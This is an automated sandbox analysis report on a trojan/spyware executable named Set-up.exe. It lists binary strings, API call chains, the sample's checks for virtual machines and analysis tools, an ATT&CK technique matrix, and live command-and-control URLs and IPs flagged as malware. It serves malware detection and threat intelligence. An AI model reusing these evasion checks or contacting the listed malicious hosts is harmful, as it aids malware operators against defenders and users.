Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008755E00_2_008755E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0051D5C00_2_0051D5C0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006FF5B00_2_006FF5B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0057F5B00_2_0057F5B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008496B00_2_008496B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008656D00_2_008656D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0088B6F00_2_0088B6F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008796500_2_00879650
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_007B36A00_2_007B36A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008857800_2_00885780
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0058D7400_2_0058D740
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008A17A00_2_008A17A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008737E00_2_008737E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_007097D00_2_007097D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0085B7200_2_0085B720
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008877300_2_00887730
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005B77E00_2_005B77E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006997900_2_00699790
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0087D8900_2_0087D890
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005BB8400_2_005BB840
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069F8500_2_0069F850
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006058300_2_00605830
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 0052CCD0 appears 37 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 005175A0 appears 394 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00629720 appears 31 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 005F44A0 appears 41 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 006C7310 appears 42 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 006EC9B0 appears 78 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 0051CAA0 appears 40 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 006EA170 appears 45 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 006ECBC0 appears 414 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 005173F0 appears 65 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 006C7120 appears 44 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00554FD0 appears 135 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 006ECA40 appears 79 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 006C7220 appears 662 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00554F40 appears 181 times
Source: Set-up.exeStatic PE information: invalid certificate
Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exeBinary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd
Source: classification engineClassification label: mal72.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0052D090 GetLastError,_errno,__sys_nerr,__sys_errlist,FormatMessageW,wcstombs,strchr,strlen,strcpy,strrchr,strrchr,_errno,GetLastError,SetLastError,_errno,_errno,GetLastError,0_2_0052D090
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0051255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0051255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_005129FF
Source: C:\Users\user\Desktop\Set-up.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Set-up.exeVirustotal: Detection: 31%
Source: Set-up.exeString found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: Set-up.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exeString found in binary or memory: id-cmc-addExtensions
Source: Set-up.exeString found in binary or memory: set-addPolicy
Source: Set-up.exeString found in binary or memory: in-addr.arpa
Source: Set-up.exeString found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectorysystem_win32.c@
Source: Set-up.exeString found in binary or memory: in-addr.arpa
Source: Set-up.exeString found in binary or memory: 8L0123456789abcdefin-addr.arpaip6.arpa
Source: Set-up.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exeString found in binary or memory: JM[\Unable to allocate space for channel dataFailed allocating memory for channel type nameUnable to allocate temporary space for packetWould block sending channel-open requestUnable to send channel-open requestWould blockUnexpected errorUnexpected packet sizeChannel open failure (administratively prohibited)Channel open failure (connect failed)Channel open failure (unknown channel type)Channel open failure (resource shortage)Channel open failureUnable to allocate memory for setenv packetcancel-tcpip-forwardWould block sending forward requestUnable to send global-request packet for forward listen requestauth-agent-req@openssh.comauth-agent-reqcdChannel can not be reusedUnable to allocate memory for channel-process requestWould block sending channel requestUnable to send channel requestFailed waiting for channel successUnable to complete request for channel-process-startupUnexpected packet lengthUnable to allocate memory for signal nameWould block sending window adjustUnable to send transfer-window adjustment packet, deferringtransport readwould blockWe have already closed this channelEOF has already been received, data might be ignoredFailure while draining incoming flowUnable to send channel dataUnable to send EOF, but closing channel anywayWould block sending close-channelUnable to send close-channel request, but closing anywaysessionchannel.cUnable to allocate memory for direct-tcpip connectiondirect-tcpipUnable to allocate memory for direct-streamlocal connectiondirect-streamlocal@openssh.comQR0.0.0.0tcpip-forwardWould block sending global-request packet for forward listen requestUnknownUnable to allocate memory for listener queueUnable to complete request for forward-listenWould block waiting for packetChannel not foundcdenvWould block sending setenv requestUnable to send channel-request packet for setenv requestFailed getting response for channel-setenvUnable to complete request for channel-setenvcdWould block sending auth-agent requestUnable to send auth-agent requestFailed to request auth-agentUnable to complete request for auth-agentcdterm + mode lengths too largepty-reqWould block sending pty requestUnable to send pty-request packetFailed to require the PTY packageUnable to complete request for channel request-ptywindow-changeWould block sending window-change requestUnable to send window-change packetcdUnable to allocate memory for pty-requestx11-reqMIT-MAGIC-COOKIE-1Unable to get random bytes for x11-req cookie%02XWould block sending X11-req packetUnable to send x11-req packetwaiting for x11-req response packetUnable to complete request for channel x11-reqWould block sending EOFUnable to send EOF on channelReceiving channel window has been exhausted_libssh2_transport_read() bailed out!libssh2_channel_wait_closed() invoked when channel is not in EOF stateUnable to allocate memory for signal requestsignalWould block sending signal requestUnable to send signal packetecdsa-sha2-nistp256ecdsa-sha2-nistp384ecdsa-sha2-nistp521blocksize <= siz
Source: Set-up.exeString found in binary or memory: id-cmc-addExtensions
Source: Set-up.exeString found in binary or memory: set-addPolicy
Source: Set-up.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
Source: Set-up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exeStatic file information: File size 7793288 > 1048576
Source: Set-up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x4b1c00
Source: Set-up.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x12e200
Source: Set-up.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x151c00
Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005114E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005114E0
Source: Set-up.exeStatic PE information: section name: .eh_fram
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_01431354 pushfd ; retf 0_3_01431355
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_01431354 pushfd ; retf 0_3_01431355
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_01431354 pushfd ; retf 0_3_01431355
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_01431354 pushfd ; retf 0_3_01431355
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_01431354 pushfd ; retf 0_3_01431355
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142385A push ebx; iretd 0_3_0142385C
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_01428765 push edx; retf 0020h0_3_01428782
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_01428765 push edx; retf 0020h0_3_01428782
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_01428765 push edx; retf 0020h0_3_01428782
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_01428765 push edx; retf 0020h0_3_01428782
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142AF75 push edi; retf 0_3_0142AF9A
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142AF75 push edi; retf 0_3_0142AF9A
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142AF75 push edi; retf 0_3_0142AF9A
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142AF75 push edi; retf 0_3_0142AF9A
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142AF75 push edi; retf 0_3_0142AF9A
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142B718 push esp; retf 0020h0_3_0142B792
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142B718 push esp; retf 0020h0_3_0142B792
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142B718 push esp; retf 0020h0_3_0142B792
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142B718 push esp; retf 0020h0_3_0142B792
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142B718 push esp; retf 0020h0_3_0142B792
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142CEFB push ss; iretd 0_3_0142CEBA
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142CEFB push ss; iretd 0_3_0142CEBA
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142CEFB push ss; iretd 0_3_0142CEBA
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142CEFB push ss; iretd 0_3_0142CEBA
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142CEFB push ss; iretd 0_3_0142CEBA
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142B795 push esp; iretd 0_3_0142B7BA
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142B795 push esp; iretd 0_3_0142B7BA
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142B795 push esp; iretd 0_3_0142B7BA
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142B795 push esp; iretd 0_3_0142B7BA
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142B795 push esp; iretd 0_3_0142B7BA
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0142CEB1 push ss; iretd 0_3_0142CEBA

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\Set-up.exeCode function: C:\Windows\System32\VBox*.dll vbox_first SYSTEM\ControlSet001\Services\VBoxSF vbox_second 0_2_005129FF
Source: Set-up.exeBinary or memory string: PROCMON.EXE
Source: Set-up.exeBinary or memory string: X64DBG.EXE
Source: Set-up.exeBinary or memory string: WINDBG.EXE
Source: Set-up.exeBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Set-up.exeBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_005129FF
Source: C:\Users\user\Desktop\Set-up.exeAPI coverage: 7.9 %
Source: C:\Users\user\Desktop\Set-up.exe TID: 3760Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0051255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0051255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_005129FF
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006EE270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,0_2_006EE270
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0051255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0051255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0051255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0051255D
Source: Set-up.exe, 00000000.00000003.1676246691.00000000013D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: Set-up.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Set-up.exe, 00000000.00000003.1854020138.0000000001426000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1856332412.000000000142A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854245792.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854386736.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853869075.000000000141C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: Set-up.exeBinary or memory string: Hyper-V RAW
Source: Set-up.exeBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000000.00000003.1676579286.00000000012F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_005129FF
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005114E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005114E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0051116C Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,_cexit,_initterm,exit,0_2_0051116C
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00511160 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,0_2_00511160
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005111A3 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,0_2_005111A3
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005113C9 SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,0_2_005113C9
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006F93D0 GetSystemTime,SystemTimeToFileTime,0_2_006F93D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009B8E70 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,0_2_009B8E70
Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Set-up.exe, Set-up.exe, 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: Set-up.exe, Set-up.exe, 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 34.147.147.173:80
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0054A550 setsockopt,_errno,_errno,_errno,_errno,setsockopt,WSAGetLastError,getsockopt,setsockopt,strlen,htons,getsockopt,setsockopt,WSAGetLastError,WSAGetLastError,strchr,htons,bind,WSAGetLastError,htons,bind,WSAGetLastError,htons,strtoul,0_2_0054A550
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005DAA30 htons,htons,socket,ioctlsocket,setsockopt,setsockopt,htonl,bind,setsockopt,setsockopt,connect,WSAGetLastError,closesocket,0_2_005DAA30
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0055E480 strlen,strchr,strchr,strchr,strtoul,strchr,strtoul,memcpy,getsockname,WSAGetLastError,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,bind,htons,bind,WSAGetLastError,getsockname,listen,listen,WSAGetLastError,htons,0_2_0055E480
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
11
Virtualization/Sandbox Evasion
OS Credential Dumping1
System Time Discovery
Remote Services11
Archive Collected Data
21
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS Memory221
Security Software Discovery
Remote Desktop Protocol1
Data from Local System
2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information
Security Account Manager11
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS12
Process Discovery
Distributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync17
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Set-up.exe32%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435100%Avira URL Cloudmalware
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo17356394355a1100%Avira URL Cloudmalware
http://home.eleventj11vt.top/olN100%Avira URL Cloudmalware
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435http://home.eleventj11vt.top/olN100%Avira URL Cloudmalware
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435::3100%Avira URL Cloudmalware
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435?argument=100%Avira URL Cloudmalware
https://httpbin.org/ipI0%Avira URL Cloudsafe
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdR435100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
home.eleventj11vt.top
34.147.147.173
truefalse
    high
    httpbin.org
    34.200.57.114
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435true
      • Avira URL Cloud: malware
      unknown
